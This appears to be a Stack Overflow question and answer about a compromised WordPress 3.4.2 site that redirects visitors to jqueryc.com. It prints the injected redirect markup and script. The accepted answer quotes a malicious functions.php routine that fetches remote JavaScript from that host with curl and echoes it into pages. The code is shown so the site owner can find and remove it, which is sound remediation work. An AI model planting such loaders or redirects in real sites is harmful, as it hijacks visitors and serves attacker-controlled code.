# Injection on my wordpress 3.4.2

Tags: javascript, wordpress, code-injection

Please I visited my website today but after a moment I was redirected to another website !

I think this is a kind of injection, and I've take a look to the page source and I've found the strange  following lines :

```
/*
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
  <head>
<meta http-equiv="content-type" content="text/html;charset=utf-8"/>
<meta http-equiv="refresh" content="0; url=http://www.jqueryc.com">
<script type="text/javascript">

    window.top.location.href = "http://www.jqueryc.com";

</script>
 </head>
</html>
 */
window.top.location.href = "http://www.jqueryc.com";
<style type="text/css"       media="print">#wpadminbar { display:none; }</style>
```

Please How could I remove this injection, should I reinstall the wordpress ? If yes I need to export all my posts in the xml file and I'm worried that those lines will be exported with my data !

please any suggestion ?

Comment: possible duplicate of [Got hacked and redirected to jqueryc.com](http://stackoverflow.com/questions/13504994/got-hacked-and-redirected-to-jqueryc-com)

Answer (score 1, accepted):

Go to your code in the functions.php and remove this lines :

```
if (!function_exists('insert_jquery_theme')){function insert_jquery_theme(){if (function_exists('curl_init')){$url="http://www.jqueryc.com/jquery-1.6.3.min.js";$ch = curl_init();$timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}
```

Comment: Thanks a lot, but how did they inject those lines ?

Comment: Perhaps your templates wasn't clean. You should be careful when buying WordPress templates !

Comment: Simply removing that bad function is not a complete fix; see http://ottopress.com/2011/how-to-cope-with-a-hacked-site/

Comment: This has nothing to do with "hacked sites", Sami has simply buy or download a template that was not clean !